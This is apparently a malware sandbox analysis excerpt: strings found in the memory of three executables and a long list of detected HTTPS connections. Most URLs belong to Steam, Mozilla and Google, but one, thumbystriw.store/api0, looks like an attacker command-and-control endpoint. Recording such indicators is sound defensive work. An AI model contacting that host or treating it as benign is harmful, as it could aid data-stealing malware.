Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C80f26d8df816a96
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2328896938.000000002384F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thumbystriw.store:443/api0
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797891117.0000000001378000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797500848.0000000001374000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/0x1024
Source: file.exe, 00000000.00000003.2328896938.000000002384F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786605901.0000000005B92000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2906663974.0000000005905000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2328896938.000000002384F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786605901.0000000005B92000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2906663974.0000000005905000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2328896938.000000002384F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786605901.0000000005B92000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2906663974.0000000005905000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079573151.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50301
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 50290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
